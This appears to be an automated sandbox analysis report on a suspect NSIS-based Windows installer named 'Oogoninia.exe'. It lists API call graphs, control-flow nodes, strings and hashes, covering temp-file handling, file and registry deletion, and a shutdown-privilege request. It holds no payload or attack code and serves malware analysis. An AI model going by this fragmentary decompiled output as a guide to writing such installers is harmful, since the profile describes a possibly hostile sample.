5211->5212 5213 401e43 ShowWindow 5212->5213 5214 401e4e EnableWindow 5212->5214 5215 40295e 5213->5215 5214->5215 5216 401f2d 5217 402ace 18 API calls 5216->5217 5218 401f34 5217->5218 5219 4060a4 2 API calls 5218->5219 5220 401f3a 5219->5220 5222 401f4c 5220->5222 5223 405cfe wsprintfA 5220->5223 5223->5222 5224 404f2d 5225 404f51 5224->5225 5226 404f3d 5224->5226 5227 404f59 IsWindowVisible 5225->5227 5235 404f70 5225->5235 5228 404f43 5226->5228 5229 404f9a 5226->5229 5227->5229 5230 404f66 5227->5230 5232 403fd1 SendMessageA 5228->5232 5231 404f9f CallWindowProcA 5229->5231 5237 404884 SendMessageA 5230->5237 5234 404f4d 5231->5234 5232->5234 5235->5231 5242 404904 5235->5242 5238 4048e3 SendMessageA 5237->5238 5239 4048a7 GetMessagePos ScreenToClient SendMessageA 5237->5239 5241 4048db 5238->5241 5240 4048e0 5239->5240 5239->5241 5240->5238 5241->5235 5251 405da0 lstrcpynA 5242->5251 5244 404917 5252 405cfe wsprintfA 5244->5252 5246 404921 5247 40140b 2 API calls 5246->5247 5248 40492a 5247->5248 5253 405da0 lstrcpynA 5248->5253 5250 404931 5250->5229 5251->5244 5252->5246 5253->5250 5254 403ab2 5255 403c05 5254->5255 5256 403aca 5254->5256 5258 403c56 5255->5258 5259 403c16 GetDlgItem GetDlgItem 5255->5259 5256->5255 5257 403ad6 5256->5257 5260 403ae1 SetWindowPos 5257->5260 5261 403af4 5257->5261 5263 403cb0 5258->5263 5272 401389 2 API calls 5258->5272 5262 403f85 19 API calls 5259->5262 5260->5261 5265 403b11 5261->5265 5266 403af9 ShowWindow 5261->5266 5267 403c40 SetClassLongA 5262->5267 5264 403fd1 SendMessageA 5263->5264 5268 403c00 5263->5268 5294 403cc2 5264->5294 5269 403b33 5265->5269 5270 403b19 DestroyWindow 5265->5270 5266->5265 5271 40140b 2 API calls 5267->5271 5274 403b38 SetWindowLongA 5269->5274 5275 403b49 5269->5275 5273 403f0e 5270->5273 5271->5258 5276 403c88 5272->5276 5273->5268 5283 403f3f ShowWindow 5273->5283 5274->5268 5280 403bc0 5275->5280 5281 403b55 GetDlgItem 5275->5281 5276->5263 5277 403c8c SendMessageA 5276->5277 
5277->5268 5278 40140b 2 API calls 5278->5294 5279 403f10 DestroyWindow EndDialog 5279->5273 5282 403fec 8 API calls 5280->5282 5284 403b85 5281->5284 5285 403b68 SendMessageA IsWindowEnabled 5281->5285 5282->5268 5283->5268 5287 403b92 5284->5287 5288 403bd9 SendMessageA 5284->5288 5289 403ba5 5284->5289 5297 403b8a 5284->5297 5285->5268 5285->5284 5286 405dc2 18 API calls 5286->5294 5287->5288 5287->5297 5288->5280 5292 403bc2 5289->5292 5293 403bad 5289->5293 5290 403f5e SendMessageA 5290->5280 5291 403f85 19 API calls 5291->5294 5296 40140b 2 API calls 5292->5296 5295 40140b 2 API calls 5293->5295 5294->5268 5294->5278 5294->5279 5294->5286 5294->5291 5298 403f85 19 API calls 5294->5298 5313 403e50 DestroyWindow 5294->5313 5295->5297 5296->5297 5297->5280 5297->5290 5299 403d3d GetDlgItem 5298->5299 5300 403d52 5299->5300 5301 403d5a ShowWindow EnableWindow 5299->5301 5300->5301 5322 403fa7 EnableWindow 5301->5322 5303 403d84 EnableWindow 5306 403d98 5303->5306 5304 403d9d GetSystemMenu EnableMenuItem SendMessageA 5305 403dcd SendMessageA 5304->5305 5304->5306 5305->5306 5306->5304 5323 403fba SendMessageA 5306->5323 5324 405da0 lstrcpynA 5306->5324 5309 403dfb lstrlenA 5310 405dc2 18 API calls 5309->5310 5311 403e0c SetWindowTextA 5310->5311 5312 401389 2 API calls 5311->5312 5312->5294 5313->5273 5314 403e6a CreateDialogParamA 5313->5314 5314->5273 5315 403e9d 5314->5315 5316 403f85 19 API calls 5315->5316 5317 403ea8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5316->5317 5318 401389 2 API calls 5317->5318 5319 403eee 5318->5319 5319->5268 5320 403ef6 ShowWindow 5319->5320 5321 403fd1 SendMessageA 5320->5321 5321->5273 5322->5303 5323->5306 5324->5309 5325 401eb3 5326 402ace 18 API calls 5325->5326 5327 401eb9 5326->5327 5328 404fb9 25 API calls 5327->5328 5329 401ec3 5328->5329 5330 405531 2 API calls 5329->5330 5333 401ec9 5330->5333 5331 401f1f CloseHandle 5335 402729 5331->5335 5332 401ee8 WaitForSingleObject 5332->5333 5334 401ef6 
GetExitCodeProcess 5332->5334 5333->5331 5333->5332 5333->5335 5336 406175 2 API calls 5333->5336 5337 401f11 5334->5337 5338 401f08 5334->5338 5336->5332 5337->5331 5340 405cfe wsprintfA 5338->5340 5340->5337 4327 402336 4328 402ace 18 API calls 4327->4328 4329 402347 4328->4329 4330 402ace 18 API calls 4329->4330 4331 402350 4330->4331 4332 402ace 18 API calls 4331->4332 4333 40235a GetPrivateProfileStringA 4332->4333 5341 404936 GetDlgItem GetDlgItem 5342 404988 7 API calls 5341->5342 5348 404ba0 5341->5348 5343 404a2b DeleteObject 5342->5343 5344 404a1e SendMessageA 5342->5344 5345 404a34 5343->5345 5344->5343 5346 404a6b 5345->5346 5347 405dc2 18 API calls 5345->5347 5349 403f85 19 API calls 5346->5349 5351 404a4d SendMessageA SendMessageA 5347->5351 5355 404c84 5348->5355 5358 404884 5 API calls 5348->5358 5378 404c11 5348->5378 5354 404a7f 5349->5354 5350 404d30 5352 404d42 5350->5352 5353 404d3a SendMessageA 5350->5353 5351->5345 5362 404d54 ImageList_Destroy 5352->5362 5363 404d5b 5352->5363 5373 404d6b 5352->5373 5353->5352 5359 403f85 19 API calls 5354->5359 5355->5350 5360 404cdd SendMessageA 5355->5360 5384 404b93 5355->5384 5356 403fec 8 API calls 5361 404f26 5356->5361 5357 404c76 SendMessageA 5357->5355 5358->5378 5379 404a8d 5359->5379 5364 404cf2 SendMessageA 5360->5364 5360->5384 5362->5363 5366 404d64 GlobalFree 5363->5366 5363->5373 5368 404d05 5364->5368 5365 404eda 5369 404eec ShowWindow GetDlgItem ShowWindow 5365->5369 5365->5384 5366->5373 5367 404b61 GetWindowLongA SetWindowLongA 5370 404b7a 5367->5370 5374 404d16 SendMessageA 5368->5374 5369->5384 5371 404b80 ShowWindow 5370->5371 5372 404b98 5370->5372 5392 403fba SendMessageA 5371->5392 5393 403fba SendMessageA 5372->5393 5373->5365 5383 404904 4 API calls 5373->5383 5388 404da6 5373->5388 5374->5350 5375 404b5b 5375->5367 5375->5370 5378->5355 5378->5357 5379->5367 5379->5375 5380 404adc SendMessageA 5379->5380 5381 404b18 SendMessageA 5379->5381 5382 404b29 SendMessageA 5379->5382 
5380->5379 5381->5379 5382->5379 5383->5388 5384->5356 5385 404eb0 InvalidateRect 5385->5365 5386 404ec6 5385->5386 5389 40483f 21 API calls 5386->5389 5387 404dd4 SendMessageA 5391 404dea 5387->5391 5388->5387 5388->5391 5389->5365 5390 404e5e SendMessageA SendMessageA 5390->5391 5391->5385 5391->5390 5392->5384 5393->5348 5394 4014b7 5395 4014bd 5394->5395 5396 401389 2 API calls 5395->5396 5397 4014c5 5396->5397 5398 401b39 5399 402ace 18 API calls 5398->5399 5400 401b40 5399->5400 5401 402aac 18 API calls 5400->5401 5402 401b49 wsprintfA 5401->5402 5403 40295e 5402->5403 5404 402939 SendMessageA 5405 402953 InvalidateRect 5404->5405 5406 40295e 5404->5406 5405->5406 4409 4015bb 4410 402ace 18 API calls 4409->4410 4411 4015c2 4410->4411 4412 4058ab 4 API calls 4411->4412 4425 4015ca 4412->4425 4413 401624 4415 401629 4413->4415 4417 401652 4413->4417 4414 40583d CharNextA 4414->4425 4428 401423 4415->4428 4419 401423 25 API calls 4417->4419 4424 40164a 4419->4424 4421 4054fc 2 API calls 4421->4425 4422 405519 5 API calls 4422->4425 4423 40163b SetCurrentDirectoryA 4423->4424 4425->4413 4425->4414 4425->4421 4425->4422 4426 40160c GetFileAttributesA 4425->4426 4427 40547f 4 API calls 4425->4427 4426->4425 4427->4425 4429 404fb9 25 API calls 4428->4429 4430 401431 4429->4430 4431 405da0 lstrcpynA 4430->4431 4431->4423 5407 4016bb 5408 402ace 18 API calls 5407->5408 5409 4016c1 GetFullPathNameA 5408->5409 5410 4016d8 5409->5410 5416 4016f9 5409->5416 5413 4060a4 2 API calls 5410->5413 5410->5416 5411 40170d GetShortPathNameA 5412 40295e 5411->5412 5414 4016e9 5413->5414 5414->5416 5417 405da0 lstrcpynA 5414->5417 5416->5411 5416->5412 5417->5416 5418 401d3b GetDlgItem GetClientRect 5419 402ace 18 API calls 5418->5419 5420 401d6b LoadImageA SendMessageA 5419->5420 5421 401d89 DeleteObject 5420->5421 5422 40295e 5420->5422 5421->5422

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 403180-4031b5 SetErrorMode GetVersion 1 4031b7-4031bf call 406139 0->1 2 4031c8 0->2 1->2 7 4031c1 1->7 4 4031cd-4031e0 call 4060cb lstrlenA 2->4 9 4031e2-403255 call 406139 * 2 #17 OleInitialize SHGetFileInfoA call 405da0 GetCommandLineA call 405da0 GetModuleHandleA 4->9 7->2 18 403261-403276 call 40583d CharNextA 9->18 19 403257-40325c 9->19 22 40333b-40333f 18->22 19->18 23 403345 22->23 24 40327b-40327e 22->24 27 403358-403372 GetTempPathA call 40314f 23->27 25 403280-403284 24->25 26 403286-40328e 24->26 25->25 25->26 28 403290-403291 26->28 29 403296-403299 26->29 34 403374-403392 GetWindowsDirectoryA lstrcatA call 40314f 27->34 35 4033ca-4033e4 DeleteFileA call 402cfa 27->35 28->29 31 40332b-403338 call 40583d 29->31 32 40329f-4032a3 29->32 31->22 51 40333a 31->51 37 4032a5-4032ab 32->37 38 4032bb-4032e8 32->38 34->35 52 403394-4033c4 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 40314f 34->52 53 403478-403488 call 403646 OleUninitialize 35->53 54 4033ea-4033f0 35->54 44 4032b1 37->44 45 4032ad-4032af 37->45 40 4032ea-4032f0 38->40 41 4032fb-403329 38->41 47 4032f2-4032f4 40->47 48 4032f6 40->48 41->31 49 403347-403353 call 405da0 41->49 44->38 45->38 45->44 47->41 47->48 48->41 49->27 51->22 52->35 52->53 66 4035ac-4035b2 53->66 67 40348e-40349e call 405596 ExitProcess 53->67 57 4033f2-4033fd call 40583d 54->57 58 403468-40346f call 403720 54->58 71 403433-40343d 57->71 72 4033ff-403428 57->72 64 403474 58->64 64->53 69 4035b4-4035cd GetCurrentProcess OpenProcessToken 66->69 70 40362e-403636 66->70 78 4035ff-40360d call 406139 69->78 79 4035cf-4035f9 LookupPrivilegeValueA AdjustTokenPrivileges 69->79 73 403638 70->73 74 40363c-403640 ExitProcess 70->74 76 4034a4-4034b8 call 405519 lstrcatA 71->76 77 40343f-40344c call 405900 71->77 80 40342a-40342c 72->80 73->74 89 4034c5-4034df lstrcatA lstrcmpiA 76->89 90 4034ba-4034c0 lstrcatA 76->90 77->53 88 40344e-403464 call 405da0 * 2 77->88 91 40361b-403625 ExitWindowsEx 78->91 92 40360f-403619 78->92 79->78 80->71 84 40342e-403431 80->84 84->71 84->80 88->58 89->53 94 4034e1-4034e4 89->94 90->89 91->70 95 403627-403629 call 40140b 91->95 92->91 92->95 97 4034e6-4034eb call 40547f 94->97 98 4034ed call 4054fc 94->98 95->70 106 4034f2-4034ff SetCurrentDirectoryA 97->106 98->106 107 403501-403507 call 405da0 106->107 108 40350c-403534 call 405da0 106->108 107->108 112 40353a-403556 call 405dc2 DeleteFileA 108->112 115 403597-40359e 112->115 116 403558-403568 CopyFileA 112->116 115->112 117 4035a0-4035a7 call 405c5b 115->117 116->115 118 40356a-40358a call 405c5b call 405dc2 call 405531 116->118 117->53 118->115 127 40358c-403593 CloseHandle 118->127 127->115
APIs
• SetErrorMode.KERNELBASE ref: 004031A5
• GetVersion.KERNEL32 ref: 004031AB
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004031D4
• #17.COMCTL32(00000007,00000009), ref: 004031F6
• OleInitialize.OLE32(00000000), ref: 004031FD
• SHGetFileInfoA.SHELL32(0079D500,00000000,?,00000160,00000000), ref: 00403219
• GetCommandLineA.KERNEL32(Leafier Setup,NSIS Error), ref: 0040322E
• GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Oogoninia.exe",00000000), ref: 00403241
• CharNextA.USER32(00000000,"C:\Users\user\Desktop\Oogoninia.exe",00000020), ref: 0040326C
• GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403369
• GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040337A
• lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403386
• GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040339A
• lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033A2
• SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033B3
• SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033BB
• DeleteFileA.KERNELBASE(1033), ref: 004033CF
  • Part of subcall function 00406139: GetModuleHandleA.KERNEL32(?,?,?,004031EA,00000009), ref: 0040614B
  • Part of subcall function 00406139: GetProcAddress.KERNEL32(00000000,?), ref: 00406166
• OleUninitialize.OLE32(?), ref: 0040347D
• ExitProcess.KERNEL32 ref: 0040349E
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004035BB
• OpenProcessToken.ADVAPI32(00000000), ref: 004035C2
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004035DA
• AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004035F9
• ExitWindowsEx.USER32(00000002,80040002), ref: 0040361D
• ExitProcess.KERNEL32 ref: 00403640
  • Part of subcall function 00405596: MessageBoxIndirectA.USER32(00409218), ref: 004055F1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
• String ID: "$"C:\Users\user\Desktop\Oogoninia.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Oogoninia.exe$C:\Users\user\slavelivets$C:\Users\user\slavelivets$Error launching installer$Leafier Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Klv$~nsu
• API String ID: 3329125770-746959003
• Opcode ID: bbf1fb5b53fc7b28b57eed0d95e8f77975159f1cadf5f6a8baec224272584505
• Instruction ID: 9be49b359e088d3119d2258a489a24960a077000951b0681bd3593dcca7d42e2
• Opcode Fuzzy Hash: bbf1fb5b53fc7b28b57eed0d95e8f77975159f1cadf5f6a8baec224272584505
• Instruction Fuzzy Hash: 03C107706086816EE7116F719D4DA2F3EACAF86306F44457FF482B52E2C77C4A058B2E
APIs
  • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
• GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B67
• lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
• lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
• GlobalFree.KERNEL32(00000000), ref: 10001BCC
• GlobalFree.KERNEL32(?), ref: 10001CC4
• GlobalFree.KERNEL32(?), ref: 10001CC9
• GlobalFree.KERNEL32(?), ref: 10001CCE
• GlobalFree.KERNEL32(00000000), ref: 10001E76
• lstrcpyA.KERNEL32(?,?), ref: 10001FCA
Memory Dump Source
• Source File: 00000000.00000002.1196297422.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1196258164.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.1196329175.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.1196354573.0000000010005000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_Oogoninia.jbxd
Similarity
• API ID: Global$Free$lstrcpy$Alloc
• String ID:
• API String ID: 4227406936-0
• Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
• Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
• Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
• Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 469 405dc2-405dcd 470 405de0-405df5 469->470 471 405dcf-405dde 469->471 472 405fe8-405fec 470->472 473 405dfb-405e06 470->473 471->470 474 405ff2-405ffc 472->474 475 405e18-405e22 472->475 473->472 476 405e0c-405e13 473->476 477 406007-406008 474->477 478 405ffe-406002 call 405da0 474->478 475->474 479 405e28-405e2f 475->479 476->472 478->477 481 405e35-405e6a 479->481 482 405fdb 479->482 483 405e70-405e7b GetVersion 481->483 484 405f85-405f88 481->484 485 405fe5-405fe7 482->485 486 405fdd-405fe3 482->486 487 405e95 483->487 488 405e7d-405e81 483->488 489 405fb8-405fbb 484->489 490 405f8a-405f8d 484->490 485->472 486->472 494 405e9c-405ea3 487->494 488->487 491 405e83-405e87 488->491 495 405fc9-405fd9 lstrlenA 489->495 496 405fbd-405fc4 call 405dc2 489->496 492 405f9d-405fa9 call 405da0 490->492 493 405f8f-405f9b call 405cfe 490->493 491->487 497 405e89-405e8d 491->497 507 405fae-405fb4 492->507 493->507 499 405ea5-405ea7 494->499 500 405ea8-405eaa 494->500 495->472 496->495 497->487 503 405e8f-405e93 497->503 499->500 505 405ee3-405ee6 500->505 506 405eac-405ec7 call 405c87 500->506 503->494 508 405ef6-405ef9 505->508 509 405ee8-405ef4 GetSystemDirectoryA 505->509 515 405ecc-405ecf 506->515 507->495 511 405fb6 507->511 513 405f63-405f65 508->513 514 405efb-405f09 GetWindowsDirectoryA 508->514 512 405f67-405f6a 509->512 516 405f7d-405f83 call 40600b 511->516 512->516 520 405f6c-405f70 512->520 513->512 518 405f0b-405f15 513->518 514->513 519 405ed5-405ede call 405dc2 515->519 515->520 516->495 522 405f17-405f1a 518->522 523 405f2f-405f45 SHGetSpecialFolderLocation 518->523 519->512 520->516 525 405f72-405f78 lstrcatA 520->525 522->523 526 405f1c-405f23 522->526 527 405f60 523->527 528 405f47-405f5e SHGetPathFromIDListA CoTaskMemFree 523->528 525->516 530 405f2b-405f2d 526->530 527->513 528->512 528->527 530->512 530->523
APIs
• GetVersion.KERNEL32(00000006,0079DD20,00000000,00404FF1,0079DD20,00000000), ref: 00405E73
• GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405EEE
• GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405F01
• SHGetSpecialFolderLocation.SHELL32(?,0078FCF8), ref: 00405F3D
• SHGetPathFromIDListA.SHELL32(0078FCF8,Call), ref: 00405F4B
• CoTaskMemFree.OLE32(0078FCF8), ref: 00405F56
• lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F78
• lstrlenA.KERNEL32(Call,00000006,0079DD20,00000000,00404FF1,0079DD20,00000000), ref: 00405FCA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                                    • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch

                                                                                                                                                                                    Control-flow Graph (rendered graph of basic blocks 405642 through 40580f; image not preserved)
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileA.KERNELBASE(?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040566B
                                                                                                                                                                                    • lstrcatA.KERNEL32(0079F548,\*.*,0079F548,?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056B3
                                                                                                                                                                                    • lstrcatA.KERNEL32(?,00409014,?,0079F548,?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056D4
                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00409014,?,0079F548,?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056DA
                                                                                                                                                                                    • FindFirstFileA.KERNEL32(0079F548,?,?,?,00409014,?,0079F548,?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056EB
                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405798
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004057A9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040564F
                                                                                                                                                                                    • "C:\Users\user\Desktop\Oogoninia.exe", xrefs: 00405642
                                                                                                                                                                                    • \*.*, xrefs: 004056AD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\Oogoninia.exe"$C:\Users\user\AppData\Local\Temp\$\*.*

                                                                                                                                                                                    Control-flow Graph (rendered graph of basic blocks 402b0e through 402bc1; image not preserved)
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000000,?), ref: 00402B2F
                                                                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B6B
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402B74
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402B99
                                                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402BB7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(766B3410,0079FD90,C:\,00405943,C:\,C:\,00000000,C:\,C:\,766B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,766B3410,C:\Users\user\AppData\Local\Temp\), ref: 004060AF
                                                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 004060BB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                    • String ID: C:\
                                                                                                                                                                                    • API String ID: 2295610775-3404278061
                                                                                                                                                                                    • Opcode ID: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                                                                                                                                                    • Instruction ID: 4d264840bddbdcf8954fb0232b098af143b8be61859f100819b52cc90bd9207d
                                                                                                                                                                                    • Opcode Fuzzy Hash: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                                                                                                                                                    • Instruction Fuzzy Hash: AAD0127595A1205BC71197787C0C84B7A589B053307114A32F46AF22E0D6349C7686E9

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
• Graph: [rendered control-flow graph not preserved; first basic block 403720-403738, API calls listed under APIs below]
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406139: GetModuleHandleA.KERNEL32(?,?,?,004031EA,00000009), ref: 0040614B
                                                                                                                                                                                      • Part of subcall function 00406139: GetProcAddress.KERNEL32(00000000,?), ref: 00406166
                                                                                                                                                                                    • lstrcatA.KERNEL32(1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,766B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Oogoninia.exe",00000000), ref: 0040379B
                                                                                                                                                                                    • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\slavelivets,1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,766B3410), ref: 00403810
                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,.exe), ref: 00403823
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(Call), ref: 0040382E
                                                                                                                                                                                    • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\slavelivets), ref: 00403877
                                                                                                                                                                                      • Part of subcall function 00405CFE: wsprintfA.USER32 ref: 00405D0B
                                                                                                                                                                                    • RegisterClassA.USER32(007A16E0), ref: 004038B4
                                                                                                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004038CC
                                                                                                                                                                                    • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403901
                                                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403937
